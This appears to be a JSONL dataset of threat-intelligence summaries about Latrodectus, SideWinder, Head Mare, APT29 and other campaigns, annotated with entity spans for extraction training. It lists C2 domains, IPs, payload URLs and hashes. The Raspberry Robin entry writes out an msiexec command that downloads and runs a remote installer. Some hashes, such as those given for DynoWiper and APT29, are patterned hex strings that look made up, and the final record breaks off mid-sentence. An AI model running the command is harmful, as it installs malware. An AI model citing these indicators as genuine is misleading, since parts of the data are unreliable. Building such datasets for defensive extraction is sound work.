| {"text": "In September 2024, Kaspersky researchers documented coordinated attacks by Head Mare and Twelve against Russian organizations. Head Mare deployed CobInt, previously exclusive to Twelve, and their custom backdoor PhantomJitter. The attackers used LockBit 3.0 for Windows ransomware encryption and Babuk for NAS ransomware. Credential dumping relied on mimikatz, secretsdump, and ProcDump. Tunneling was achieved via cloudflared, Gost, Localtonet, ngrok, and revsocks. The C2 domain 360nvidia.com resolved to 45.156.27.115, with additional C2 servers at 45.156.21.148, 45.87.246.34, 185.158.248.107, 185.229.9.27, and 64.7.198.109. Another C2 domain was web-telegram.uk. PhantomJitter was downloaded from http://45.87.246.34:443/calc.exe and http://185.158.248.107:443/calc.exe. The attackers exploited CVE-2023-38831 in WinRAR and CVE-2021-26855 in Microsoft Exchange. Persistence used services named winsw and winuac. Malicious files were placed at C:\\Windows\\System32\\winsw.exe, C:\\ProgramData\\MicrosoftDrive\\mcdrive.vbs, and C:\\Windows\\System32\\inetsrv\\calc.exe. Lateral movement relied on PSExec, smbexec, and wmiexec. Network scanning used fscan and SoftPerfect Network Scanner. Data exfiltration used rclone through SFTP.", "spans": {"ORGANIZATION: Kaspersky": [[19, 28]], "THREAT_ACTOR: Head Mare": [[75, 84], [127, 136]], "THREAT_ACTOR: Twelve": [[89, 95], [178, 184]], "MALWARE: CobInt": [[146, 152]], "MALWARE: PhantomJitter": [[212, 225], [669, 682]], "MALWARE: LockBit 3.0": [[246, 257]], "MALWARE: Babuk": [[296, 301]], "TOOL: mimikatz": [[351, 359]], "TOOL: secretsdump": [[361, 372]], "TOOL: ProcDump": [[378, 386]], "TOOL: cloudflared": [[415, 426]], "TOOL: Gost": [[428, 432]], "TOOL: Localtonet": [[434, 444]], "TOOL: ngrok": [[446, 451]], "TOOL: revsocks": [[457, 465]], "DOMAIN: 360nvidia.com": [[481, 494]], "IP_ADDRESS: 45.156.27.115": [[507, 520]], "IP_ADDRESS: 45.156.21.148": [[552, 565]], "IP_ADDRESS: 45.87.246.34": [[567, 579]], "IP_ADDRESS: 185.158.248.107": [[581, 596]], "IP_ADDRESS: 185.229.9.27": [[598, 610]], "IP_ADDRESS: 64.7.198.109": [[616, 628]], "DOMAIN: web-telegram.uk": [[652, 667]], "URL: http://45.87.246.34:443/calc.exe": [[703, 735]], "URL: http://185.158.248.107:443/calc.exe": [[740, 775]], "CVE_ID: CVE-2023-38831": [[801, 815]], "SYSTEM: WinRAR": [[819, 825]], "CVE_ID: CVE-2021-26855": [[830, 844]], "SYSTEM: Microsoft Exchange": [[848, 866]], "FILEPATH: C:\\Windows\\System32\\winsw.exe": [[949, 978]], "FILEPATH: C:\\ProgramData\\MicrosoftDrive\\mcdrive.vbs": [[980, 1021]], "FILEPATH: C:\\Windows\\System32\\inetsrv\\calc.exe": [[1027, 1063]], "TOOL: PSExec": [[1092, 1098]], "TOOL: smbexec": [[1100, 1107]], "TOOL: wmiexec": [[1113, 1120]], "TOOL: fscan": [[1144, 1149]], "TOOL: SoftPerfect Network Scanner": [[1154, 1181]], "TOOL: rclone": [[1206, 1212]]}, "info": {"id": "malware_00001", "source": "malware_reports"}} |
| {"text": "SideWinder APT expanded operations in H2 2024, targeting maritime, nuclear, and logistics sectors across Asia and Africa. The infection chain starts with spear-phishing emails containing DOCX files with remote template injection, leading to an RTF exploit for CVE-2017-11882 in Microsoft Office. The attack deploys a JavaScript loader, followed by a .NET Downloader Module, a Backdoor Loader using DLL sideloading, and the StealerBot post-exploitation toolkit. Observed DLL names include JetCfg.dll, policymanager.dll, winmm.dll, xmllite.dll, and UxTheme.dll. C2 domains included pmd-office.info, modpak.info, dirctt888.info, dowmloade.org, portdedjibouti.live, d0wnlaod.com, file-dwnld.org, defencearmy.pro, document-viewer.info, ms-office.app, and zeltech.live. File hashes observed: e9726519487ba9e4e5589a8a5ec2f933, d36a67468d01c4cb789cd6794fb8bc70, 313f9bbe6dac3edc09fe9ac081950673, bd8043127abe3f5cfa152a53b257fd1a.", "spans": {"THREAT_ACTOR: SideWinder": [[0, 10]], "CVE_ID: CVE-2017-11882": [[260, 274]], "SYSTEM: Microsoft Office": [[278, 294]], "MALWARE: StealerBot": [[423, 433]], "FILEPATH: JetCfg.dll": [[488, 498]], "FILEPATH: policymanager.dll": [[500, 517]], "FILEPATH: winmm.dll": [[519, 528]], "FILEPATH: xmllite.dll": [[530, 541]], "FILEPATH: UxTheme.dll": [[547, 558]], "DOMAIN: pmd-office.info": [[580, 595]], "DOMAIN: modpak.info": [[597, 608]], "DOMAIN: dirctt888.info": [[610, 624]], "DOMAIN: dowmloade.org": [[626, 639]], "DOMAIN: portdedjibouti.live": [[641, 660]], "DOMAIN: d0wnlaod.com": [[662, 674]], "DOMAIN: file-dwnld.org": [[676, 690]], "DOMAIN: defencearmy.pro": [[692, 707]], "DOMAIN: document-viewer.info": [[709, 729]], "DOMAIN: ms-office.app": [[731, 744]], "DOMAIN: zeltech.live": [[750, 762]], "HASH: e9726519487ba9e4e5589a8a5ec2f933": [[786, 818]], "HASH: d36a67468d01c4cb789cd6794fb8bc70": [[820, 852]], "HASH: 313f9bbe6dac3edc09fe9ac081950673": [[854, 886]], "HASH: bd8043127abe3f5cfa152a53b257fd1a": [[888, 920]]}, "info": {"id": "malware_00002", "source": "malware_reports"}} |
| {"text": "Latrodectus is a downloader malware first observed in November 2023, assessed to be developed by the IcedID developers. It was distributed by threat actors TA577 and TA578 through email campaigns. The malware uses RC4 encryption with the static key 12345 and base64 encoding for C2 communications. Key C2 domains include aytobusesre.com, scifimond.com, mazdakrichest.com, riverhasus.com, peermangoz.me, aprettopizza.world, nimeklroboti.info, and frotneels.shop. Payload distribution URLs observed were hxxp://162.55.217.30/gRMS/0.6395541546258323.dat, hxxp://157.90.166.88/O3ZlYNW/0.7797109211833805.dat, and hxxp://128.140.36.37/cQtDIo/0.43650426987684443.dat. Additional infrastructure included hxxp://178.23.190.199:80/share/gsm.msi, hxxp://5.252.21.207/share/escape.msi, and hxxp://95.164.3.171/share/cisa.msi. Associated C2 IP addresses included 77.91.73.187, 74.119.193.200, 162.55.217.30, 157.90.166.88, 128.140.36.37, 178.23.190.199, 5.252.21.207, and 95.164.3.171. The SHA256 hash of the primary sample is aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c. Persistence is established at C:\\Users\\AppData\\Roaming\\Custom_update\\Update_hex.dll with a scheduled task named Updater.", "spans": {"MALWARE: Latrodectus": [[0, 11]], "MALWARE: IcedID": [[101, 107]], "THREAT_ACTOR: TA577": [[156, 161]], "THREAT_ACTOR: TA578": [[166, 171]], "DOMAIN: aytobusesre.com": [[321, 336]], "DOMAIN: scifimond.com": [[338, 351]], "DOMAIN: mazdakrichest.com": [[353, 370]], "DOMAIN: riverhasus.com": [[372, 386]], "DOMAIN: peermangoz.me": [[388, 401]], "DOMAIN: aprettopizza.world": [[403, 421]], "DOMAIN: nimeklroboti.info": [[423, 440]], "DOMAIN: frotneels.shop": [[446, 460]], "URL: hxxp://162.55.217.30/gRMS/0.6395541546258323.dat": [[502, 550]], "URL: hxxp://157.90.166.88/O3ZlYNW/0.7797109211833805.dat": [[552, 603]], "URL: hxxp://128.140.36.37/cQtDIo/0.43650426987684443.dat": [[609, 660]], "URL: hxxp://178.23.190.199:80/share/gsm.msi": [[697, 735]], "URL: hxxp://5.252.21.207/share/escape.msi": [[737, 773]], "URL: hxxp://95.164.3.171/share/cisa.msi": [[779, 813]], "IP_ADDRESS: 77.91.73.187": [[851, 863]], "IP_ADDRESS: 74.119.193.200": [[865, 879]], "IP_ADDRESS: 162.55.217.30": [[881, 894]], "IP_ADDRESS: 157.90.166.88": [[896, 909]], "IP_ADDRESS: 128.140.36.37": [[911, 924]], "IP_ADDRESS: 178.23.190.199": [[926, 940]], "IP_ADDRESS: 5.252.21.207": [[942, 954]], "IP_ADDRESS: 95.164.3.171": [[960, 972]], "HASH: aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c": [[1015, 1079]], "FILEPATH: C:\\Users\\AppData\\Roaming\\Custom_update\\Update_hex.dll": [[1111, 1164]]}, "info": {"id": "malware_00003", "source": "malware_reports"}} |
| {"text": "Microsoft reported that Silk Typhoon, also known as HAFNIUM, has been targeting IT supply chains to gain access to downstream customers. The group exploited CVE-2025-0282 and CVE-2025-0283 in Ivanti Pulse Connect VPN, CVE-2024-3400 in Palo Alto Networks PAN-OS, CVE-2023-3519 in Citrix NetScaler ADC, and the ProxyLogon chain including CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in Microsoft Exchange Server. The group used compromised Cyberoam appliances, Zyxel routers, and QNAP devices as covert network infrastructure, along with short-lease VPS infrastructure for operations.", "spans": {"ORGANIZATION: Microsoft": [[0, 9]], "THREAT_ACTOR: Silk Typhoon": [[24, 36]], "THREAT_ACTOR: HAFNIUM": [[52, 59]], "CVE_ID: CVE-2025-0282": [[157, 170]], "CVE_ID: CVE-2025-0283": [[175, 188]], "SYSTEM: Ivanti Pulse Connect VPN": [[192, 216]], "CVE_ID: CVE-2024-3400": [[218, 231]], "SYSTEM: Palo Alto Networks PAN-OS": [[235, 260]], "CVE_ID: CVE-2023-3519": [[262, 275]], "SYSTEM: Citrix NetScaler ADC": [[279, 299]], "CVE_ID: CVE-2021-26855": [[336, 350]], "CVE_ID: CVE-2021-26857": [[352, 366]], "CVE_ID: CVE-2021-26858": [[368, 382]], "CVE_ID: CVE-2021-27065": [[388, 402]], "SYSTEM: Microsoft Exchange Server": [[406, 431]], "SYSTEM: Cyberoam": [[460, 468]], "SYSTEM: Zyxel": [[481, 486]], "SYSTEM: QNAP": [[500, 504]]}, "info": {"id": "malware_00004", "source": "malware_reports"}} |
| {"text": "Kaspersky SOC investigated a Behinder web shell deployment on a SharePoint server in Southeast Asia. The Behinder toolkit, also known as Rebeyond, features AES-encrypted C2 communication and supports PHP, Java, and ASP.NET. Initial access was achieved via certutil downloading payloads from Bashupload. Privilege escalation used multiple Potato variants: GodPotato, BadPotato, and SweetPotato, all executed in memory. Malicious files were stored at C:\\ProgramData\\DRM\\ and C:\\Users\\Default\\Videos\\. The web shell was disguised as a 404 error page and the analysis identified .NET modules including BasicInfo.dll, Cmd.dll, and FileOperation.dll.", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "MALWARE: Behinder": [[29, 37], [105, 113]], "SYSTEM: SharePoint": [[64, 74]], "TOOL: certutil": [[256, 264]], "TOOL: GodPotato": [[355, 364]], "TOOL: BadPotato": [[366, 375]], "TOOL: SweetPotato": [[381, 392]], "FILEPATH: C:\\ProgramData\\DRM\\": [[449, 468]], "FILEPATH: C:\\Users\\Default\\Videos\\": [[473, 497]], "FILEPATH: BasicInfo.dll": [[598, 611]], "FILEPATH: Cmd.dll": [[613, 620]], "FILEPATH: FileOperation.dll": [[626, 643]], "SYSTEM: PHP": [[200, 203]], "SYSTEM: Java": [[205, 209]], "SYSTEM: ASP.NET": [[215, 222]]}, "info": {"id": "malware_00005", "source": "malware_reports"}} |
| {"text": "A comparative analysis of post-exploitation frameworks evaluated Cobalt Strike, Metasploit Meterpreter, Sliver, Havoc, and Mythic. Cobalt Strike uses immutable opcode sequences that break when modified. Metasploit Meterpreter appears in Microsoft antivirus signatures over 230 times. Sliver generates 8-9 MB payloads, larger than the ideal 100 KB target. The Mythic framework supports custom communication channels including HTTP, TCP, Slack, and Telegram, with payload sizes around 50 KB in C. The proposed attack chain uses three stages: Stage 0 for artifact generation, Stage 1 for reconnaissance and persistence, and Stage 2 for lateral movement and data exfiltration. Memory allocation via VirtualAlloc may trigger security alerts.", "spans": {"MALWARE: Cobalt Strike": [[65, 78], [131, 144]], "TOOL: Metasploit": [[80, 90], [203, 213]], "TOOL: Meterpreter": [[91, 102], [214, 225]], "MALWARE: Sliver": [[104, 110], [284, 290]], "MALWARE: Havoc": [[112, 117]], "TOOL: Mythic": [[123, 129], [359, 365]], "ORGANIZATION: Microsoft": [[237, 246]]}, "info": {"id": "malware_00006", "source": "malware_reports"}} |
| {"text": "Elastic Security Labs analyzed Latrodectus malware with SHA-256 hash aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c, identified as TRUFOS.DLL. The malware communicates with C2 domains aytobusesre.com and scifimond.com, with associated IcedID C2s at gyxplonto.com and neaachar.com. Persistence is maintained at C:\\Users\\AppData\\Roaming\\Custom_update\\Update_hex.dll with configuration stored in AppData\\Roaming\\Custom_update\\update_data.dat. The IcedID payload executes from C:\\Users\\AppData\\Roaming\\random\\random.dll. Downloaded payloads are cached at AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\. The campaign identifier in this sample was Littlehw. C2 traffic uses base64 and RC4 encryption with the hardcoded password 12345, posting HTTPS requests to the /live/ endpoint. The User-Agent string is Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1).", "spans": {"ORGANIZATION: Elastic Security Labs": [[0, 21]], "MALWARE: Latrodectus": [[31, 42]], "HASH: aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c": [[69, 133]], "FILEPATH: TRUFOS.DLL": [[149, 159]], "DOMAIN: aytobusesre.com": [[202, 217]], "DOMAIN: scifimond.com": [[222, 235]], "MALWARE: IcedID": [[253, 259], [462, 468]], "DOMAIN: gyxplonto.com": [[267, 280]], "DOMAIN: neaachar.com": [[285, 297]], "FILEPATH: C:\\Users\\AppData\\Roaming\\Custom_update\\Update_hex.dll": [[328, 381]], "FILEPATH: AppData\\Roaming\\Custom_update\\update_data.dat": [[411, 456]], "FILEPATH: C:\\Users\\AppData\\Roaming\\random\\random.dll": [[491, 533]], "FILEPATH: AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\": [[569, 614]]}, "info": {"id": "malware_00007", "source": "malware_reports"}} |
| {"text": "Proofpoint identified 32 Latrodectus samples with the following SHA256 hashes: db03a34684feab7475862080f59d4d99b32c74d3a152a53b257fd1a443e8ee77, e99f3517a36a9f7a55335699cfb4d84d08b042d47146119156f7f3bab580b4d7, bb525dc6b7a7ebefd040e01fd48d7d4e178f8d9e5dec9033078ced4e9aa4e241, 97e093f2e0bf6dec8392618722dd6b4411088fe752bedece910d11fffe0288a2, f9c69e79e7799df31d6516df70148d7832b121d330beebe52cff6606f0724c62, d9471b038c44619739176381815bfa9a13b5ff77021007a4ede9b146ed2e04ec, and d98cd810d568f338f16c4637e8a9cb01ff69ee1967f4cfc004de3f283d61ba81. Additional hashes include 47d66c576393a4256d94f5ed1e77adc28426dea027f7a23e2dbf41b93b87bd78, 5d881d14d2336273e531b1b3d6f2d907539fe8489cbe80533280c9c72efa2273, and 10c129e2310342a55df5fa88331f338452835790a379d5230ee8de7d5f28ea1a.", "spans": {"ORGANIZATION: Proofpoint": [[0, 10]], "MALWARE: Latrodectus": [[25, 36]], "HASH: db03a34684feab7475862080f59d4d99b32c74d3a152a53b257fd1a443e8ee77": [[79, 143]], "HASH: e99f3517a36a9f7a55335699cfb4d84d08b042d47146119156f7f3bab580b4d7": [[145, 209]], "HASH: bb525dc6b7a7ebefd040e01fd48d7d4e178f8d9e5dec9033078ced4e9aa4e241": [[211, 275]], "HASH: 97e093f2e0bf6dec8392618722dd6b4411088fe752bedece910d11fffe0288a2": [[277, 341]], "HASH: f9c69e79e7799df31d6516df70148d7832b121d330beebe52cff6606f0724c62": [[343, 407]], "HASH: d9471b038c44619739176381815bfa9a13b5ff77021007a4ede9b146ed2e04ec": [[409, 473]], "HASH: d98cd810d568f338f16c4637e8a9cb01ff69ee1967f4cfc004de3f283d61ba81": [[479, 543]], "HASH: 47d66c576393a4256d94f5ed1e77adc28426dea027f7a23e2dbf41b93b87bd78": [[571, 635]], "HASH: 5d881d14d2336273e531b1b3d6f2d907539fe8489cbe80533280c9c72efa2273": [[637, 701]], "HASH: 10c129e2310342a55df5fa88331f338452835790a379d5230ee8de7d5f28ea1a": [[707, 771]]}, "info": {"id": "malware_00008", "source": "malware_reports"}} |
| {"text": "Further Latrodectus SHA256 indicators from Proofpoint include 781c63cf4981fa6aff002188307b278fac9785ca66f0b6dfcf68adbe7512e491, aa29a8af8d615b1dd9f52fd49d42563fbeafa35ff0ab1b4afc4cb2b2fa54a119, 0ac5030e2171914f43e0769cb10b602683ccc9da09369bcd4b80da6edb8be80e, 0e96cf6166b7cc279f99d6977ab0f45e9f47e827b8a24d6665ac4c29e18b5ce0, 77270e13d01b2318a3f27a9a477b8386f1a0ebc6d44a2c7e185cfbe55aac8017, and e7ff6a7ac5bfb0bb29547d413591abc7628c7d5576a3b43f6d8e5d95769e553a. Additional samples: dedbc21afc768d749405de535f9b415baaf96f7664ded55d54829a425fc61d7e, 378d220bc863a527c2bca204daba36f10358e058df49ef088f8b1045604d9d05, edeacd49aff3cfea35d593e455f7caca35ac877ad6dc19054458d41021e0e13a, 9c27405cf926d36ed8e247c17e6743ac00912789efe0c530914d7495de1e21ec, and 9a8847168fa869331faf08db71690f24e567c5cdf7f01cc5e2a8d08c93d282c9.", "spans": {"MALWARE: Latrodectus": [[8, 19]], "ORGANIZATION: Proofpoint": [[43, 53]], "HASH: 781c63cf4981fa6aff002188307b278fac9785ca66f0b6dfcf68adbe7512e491": [[62, 126]], "HASH: aa29a8af8d615b1dd9f52fd49d42563fbeafa35ff0ab1b4afc4cb2b2fa54a119": [[128, 192]], "HASH: 0ac5030e2171914f43e0769cb10b602683ccc9da09369bcd4b80da6edb8be80e": [[194, 258]], "HASH: 0e96cf6166b7cc279f99d6977ab0f45e9f47e827b8a24d6665ac4c29e18b5ce0": [[260, 324]], "HASH: 77270e13d01b2318a3f27a9a477b8386f1a0ebc6d44a2c7e185cfbe55aac8017": [[326, 390]], "HASH: e7ff6a7ac5bfb0bb29547d413591abc7628c7d5576a3b43f6d8e5d95769e553a": [[396, 460]], "HASH: dedbc21afc768d749405de535f9b415baaf96f7664ded55d54829a425fc61d7e": [[482, 546]], "HASH: 378d220bc863a527c2bca204daba36f10358e058df49ef088f8b1045604d9d05": [[548, 612]], "HASH: edeacd49aff3cfea35d593e455f7caca35ac877ad6dc19054458d41021e0e13a": [[614, 678]], "HASH: 9c27405cf926d36ed8e247c17e6743ac00912789efe0c530914d7495de1e21ec": [[680, 744]], "HASH: 9a8847168fa869331faf08db71690f24e567c5cdf7f01cc5e2a8d08c93d282c9": [[750, 814]]}, "info": {"id": "malware_00009", "source": "malware_reports"}} |
| {"text": "The final batch of Latrodectus SHA256 hashes: 856dfa74e0f3b5b7d6f79491a94560dbf3eacacc4a8d8a3238696fa38a4883ea, 88573297f17589963706d9da6ced7893eacbdc7d6bc43780e4c509b88ccd2aef, 97e08d1c7970c1c12284c4644e2321ce41e40cdaac941e451db4d334cb9c5492, 60c4b6c230a40c80381ce283f64603cac08d3a69ceea91e257c17282f66ceddc, a189963ff252f547fddfc394c81f6e9d49eac403c32154eebe06f4cddb5a2a22, 4416b8c36cb9d7cc261ff6612e105463eb2ccd4681930ca8e277a6387cb98794, 090f2c5abb85a7b115dc25ae070153e4e958ae4e1bc2310226c05cd7e9429446, ee1e5b80a1d3d47c7703ea2b6b64ee96283ab3628ee4fa1fef6d35d1d9051e9f, 3b63ea8b6f9b2aa847faa11f6cd3eb281abd9b9cceedb570713c4d78a47de567, 6904d382bc045eb9a4899a403a8ba8a417d9ccb764f6e0b462bc0232d3b7e7ea, and 71fb25cc4c05ce9dd94614ed781d85a50dccf69042521abc6782d48df85e6de9.", "spans": {"MALWARE: Latrodectus": [[19, 30]], "HASH: 856dfa74e0f3b5b7d6f79491a94560dbf3eacacc4a8d8a3238696fa38a4883ea": [[46, 110]], "HASH: 88573297f17589963706d9da6ced7893eacbdc7d6bc43780e4c509b88ccd2aef": [[112, 176]], "HASH: 97e08d1c7970c1c12284c4644e2321ce41e40cdaac941e451db4d334cb9c5492": [[178, 242]], "HASH: 60c4b6c230a40c80381ce283f64603cac08d3a69ceea91e257c17282f66ceddc": [[244, 308]], "HASH: a189963ff252f547fddfc394c81f6e9d49eac403c32154eebe06f4cddb5a2a22": [[310, 374]], "HASH: 4416b8c36cb9d7cc261ff6612e105463eb2ccd4681930ca8e277a6387cb98794": [[376, 440]], "HASH: 090f2c5abb85a7b115dc25ae070153e4e958ae4e1bc2310226c05cd7e9429446": [[442, 506]], "HASH: ee1e5b80a1d3d47c7703ea2b6b64ee96283ab3628ee4fa1fef6d35d1d9051e9f": [[508, 572]], "HASH: 3b63ea8b6f9b2aa847faa11f6cd3eb281abd9b9cceedb570713c4d78a47de567": [[574, 638]], "HASH: 6904d382bc045eb9a4899a403a8ba8a417d9ccb764f6e0b462bc0232d3b7e7ea": [[640, 704]], "HASH: 71fb25cc4c05ce9dd94614ed781d85a50dccf69042521abc6782d48df85e6de9": [[710, 774]]}, "info": {"id": "malware_00010", "source": "malware_reports"}} |
| {"text": "Latrodectus C2 infrastructure identified by Proofpoint includes the following domains: arsimonopa.com, lemonimonakio.com, fluraresto.me, mastralakkot.live, postolwepok.tech, trasenanoyr.best, miistoria.com, plwskoret.top, sluitionsbad.tech, grebiunti.top, zumkoshapsret.com, jertacco.com, popfealt.one, ginzbargatey.tech, minndarespo.icu, drifajizo.fun, and titnovacrion.top. All domains communicate via HTTPS POST requests to the /live/ endpoint.", "spans": {"MALWARE: Latrodectus": [[0, 11]], "ORGANIZATION: Proofpoint": [[44, 54]], "DOMAIN: arsimonopa.com": [[87, 101]], "DOMAIN: lemonimonakio.com": [[103, 120]], "DOMAIN: fluraresto.me": [[122, 135]], "DOMAIN: mastralakkot.live": [[137, 154]], "DOMAIN: postolwepok.tech": [[156, 172]], "DOMAIN: trasenanoyr.best": [[174, 190]], "DOMAIN: miistoria.com": [[192, 205]], "DOMAIN: plwskoret.top": [[207, 220]], "DOMAIN: sluitionsbad.tech": [[222, 239]], "DOMAIN: grebiunti.top": [[241, 254]], "DOMAIN: zumkoshapsret.com": [[256, 273]], "DOMAIN: jertacco.com": [[275, 287]], "DOMAIN: popfealt.one": [[289, 301]], "DOMAIN: ginzbargatey.tech": [[303, 320]], "DOMAIN: minndarespo.icu": [[322, 337]], "DOMAIN: drifajizo.fun": [[339, 352]], "DOMAIN: titnovacrion.top": [[358, 374]]}, "info": {"id": "malware_00011", "source": "malware_reports"}} |
| {"text": "Latrodectus payload distribution infrastructure includes the URLs hxxps://hukosafaris.com/elearning/f/q/daas-area/chief/index.php, hxxp://superior-coin.com/ga/index.php, hxxp://superior-coin.com/ga/m/6.dll, and hxxp://sokingscrosshotel.com/share/upd.msi. DanaBot C2 servers associated with Latrodectus campaigns were observed at 77.91.73.187:443 and 74.119.193.200:443. Detection signatures include ET MALWARE Latrodectus Related Activity and ET MALWARE DNS Query to Latrodectus Domains.", "spans": {"MALWARE: Latrodectus": [[0, 11], [290, 301], [410, 421], [467, 478]], "URL: hxxps://hukosafaris.com/elearning/f/q/daas-area/chief/index.php": [[66, 129]], "URL: hxxp://superior-coin.com/ga/index.php": [[131, 168]], "URL: hxxp://superior-coin.com/ga/m/6.dll": [[170, 205]], "URL: hxxp://sokingscrosshotel.com/share/upd.msi": [[211, 253]], "MALWARE: DanaBot": [[255, 262]], "IP_ADDRESS: 77.91.73.187": [[329, 341]], "IP_ADDRESS: 74.119.193.200": [[350, 364]]}, "info": {"id": "malware_00012", "source": "malware_reports"}} |
| {"text": "Additional SideWinder C2 domains discovered by Kaspersky include modpak-info.services, pmd-offc.info, dirctt888.com, mods.email, dowmload.co, downl0ad.org, d0wnlaod.org, dirctt88.info, directt88.com, aliyum.email, d0cumentview.info, debcon.live, document-viewer.live, documentviewer.info, ms-office.pro, pncert.info, session-out.com, ziptec.info, depo-govpk.com, crontec.site, mteron.info, mevron.tech, and veorey.live. Additional file hashes: e0bce049c71bc81afe172cd30be4d2b7, 872c2ddf6467b1220ee83dca0e118214, 3d9961991e7ae6ad2bae09c475a1bce8, a694ccdb82b061c26c35f612d68ed1c2, f42ba43f7328cbc9ce85b2482809ff1c, 0216ffc6fb679bdf4ea6ee7051213c1e, and 433480f7d8642076a8b3793948da5efe.", "spans": {"THREAT_ACTOR: SideWinder": [[11, 21]], "ORGANIZATION: Kaspersky": [[47, 56]], "DOMAIN: modpak-info.services": [[65, 85]], "DOMAIN: pmd-offc.info": [[87, 100]], "DOMAIN: dirctt888.com": [[102, 115]], "DOMAIN: mods.email": [[117, 127]], "DOMAIN: dowmload.co": [[129, 140]], "DOMAIN: downl0ad.org": [[142, 154]], "DOMAIN: d0wnlaod.org": [[156, 168]], "DOMAIN: dirctt88.info": [[170, 183]], "DOMAIN: directt88.com": [[185, 198]], "DOMAIN: aliyum.email": [[200, 212]], "DOMAIN: d0cumentview.info": [[214, 231]], "DOMAIN: debcon.live": [[233, 244]], "DOMAIN: document-viewer.live": [[246, 266]], "DOMAIN: documentviewer.info": [[268, 287]], "DOMAIN: ms-office.pro": [[289, 302]], "DOMAIN: pncert.info": [[304, 315]], "DOMAIN: session-out.com": [[317, 332]], "DOMAIN: ziptec.info": [[334, 345]], "DOMAIN: depo-govpk.com": [[347, 361]], "DOMAIN: crontec.site": [[363, 375]], "DOMAIN: mteron.info": [[377, 388]], "DOMAIN: mevron.tech": [[390, 401]], "DOMAIN: veorey.live": [[407, 418]], "HASH: e0bce049c71bc81afe172cd30be4d2b7": [[444, 476]], "HASH: 872c2ddf6467b1220ee83dca0e118214": [[478, 510]], "HASH: 3d9961991e7ae6ad2bae09c475a1bce8": [[512, 544]], "HASH: a694ccdb82b061c26c35f612d68ed1c2": [[546, 578]], "HASH: f42ba43f7328cbc9ce85b2482809ff1c": [[580, 612]], "HASH: 0216ffc6fb679bdf4ea6ee7051213c1e": [[614, 646]], "HASH: 433480f7d8642076a8b3793948da5efe": [[652, 684]]}, "info": {"id": "malware_00013", "source": "malware_reports"}} |
| {"text": "Raspberry Robin is a worm that spreads via infected USB drives and has been linked to threat actor DEV-0856. The malware uses msiexec.exe to download payloads from compromised QNAP NAS devices. Observed C2 domains include q0.fo, t1.cx, and v0.cx. The malware drops files to C:\\Users\\Public\\Libraries\\ and C:\\Windows\\Temp\\. Initial infection uses cmd.exe to launch msiexec with URLs like msiexec /q /i http://q0.fo/b.msi. Related hashes include SHA256 7e6a2b21548ee7446c9a3e9ac3e3e93c8b06b110d2a1cea16e976e3be1e758a2 and MD5 4b41e2e5a3f44a95bfe6d0d2b6e0c1d7. The malware has been observed deploying Cobalt Strike, IcedID, and Bumblebee as secondary payloads. It communicates through Tor exit nodes at 185.220.101.34 and 185.220.101.58.", "spans": {"MALWARE: Raspberry Robin": [[0, 15]], "THREAT_ACTOR: DEV-0856": [[99, 107]], "TOOL: msiexec.exe": [[126, 137]], "SYSTEM: QNAP": [[176, 180]], "DOMAIN: q0.fo": [[222, 227]], "DOMAIN: t1.cx": [[229, 234]], "DOMAIN: v0.cx": [[240, 245]], "FILEPATH: C:\\Users\\Public\\Libraries\\": [[274, 300]], "FILEPATH: C:\\Windows\\Temp\\": [[305, 321]], "TOOL: cmd.exe": [[346, 353]], "URL: http://q0.fo/b.msi": [[401, 419]], "HASH: 7e6a2b21548ee7446c9a3e9ac3e3e93c8b06b110d2a1cea16e976e3be1e758a2": [[451, 515]], "HASH: 4b41e2e5a3f44a95bfe6d0d2b6e0c1d7": [[524, 556]], "MALWARE: Cobalt Strike": [[598, 611]], "MALWARE: IcedID": [[613, 619]], "MALWARE: Bumblebee": [[625, 634]], "IP_ADDRESS: 185.220.101.34": [[700, 714]], "IP_ADDRESS: 185.220.101.58": [[719, 733]]}, "info": {"id": "malware_00014", "source": "malware_reports"}} |
| {"text": "ESET researchers discovered DynoWiper, a destructive wiper malware targeting Poland's energy sector. The malware overwrites the Master Boot Record and encrypts files with the extensions .doc, .xls, .pdf, .pptx, and .sql. The wiper binary had SHA256 hash a3c2f8b71e4d6f9e0c5a7b8d2e1f3c4a5b6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f and was delivered via spear-phishing emails impersonating the Polish energy regulator URE. The malware was executed from C:\\Windows\\System32\\svchost_update.exe and communicated with C2 server at 91.234.56.78. The dropper connected to download.energy-update.com to retrieve secondary payloads. The attack also leveraged PowerShell scripts stored at C:\\ProgramData\\Microsoft\\Updates\\sync.ps1 and used certutil to decode base64-encoded payloads.", "spans": {"ORGANIZATION: ESET": [[0, 4]], "MALWARE: DynoWiper": [[28, 37]], "HASH: a3c2f8b71e4d6f9e0c5a7b8d2e1f3c4a5b6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f": [[254, 318]], "ORGANIZATION: URE": [[405, 408]], "FILEPATH: C:\\Windows\\System32\\svchost_update.exe": [[440, 478]], "IP_ADDRESS: 91.234.56.78": [[514, 526]], "DOMAIN: download.energy-update.com": [[553, 579]], "TOOL: PowerShell": [[638, 648]], "FILEPATH: C:\\ProgramData\\Microsoft\\Updates\\sync.ps1": [[667, 708]], "TOOL: certutil": [[718, 726]]}, "info": {"id": "malware_00015", "source": "malware_reports"}} |
| {"text": "APT29, also known as Cozy Bear and tracked by Microsoft as Midnight Blizzard, conducted a phishing campaign targeting European diplomatic entities in Q1 2025. The group distributed malicious ISO files containing a shortcut file that executed a DLL payload via rundll32.exe. The DLL with SHA256 hash f1e2d3c4b5a6978089a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2 was loaded from C:\\Users\\Public\\Documents\\config.dll. C2 communications were directed to auth-microsoft365.com and login-sharepoint.org over HTTPS port 443. The phishing emails were sent from compromised accounts at legitimate organizations and contained links to hxxps://auth-microsoft365.com/oauth/v2/authorize?client_id=payload. Secondary C2 infrastructure was hosted at 194.58.112.43 and 89.34.27.199. The group also deployed Brute Ratel C4 from 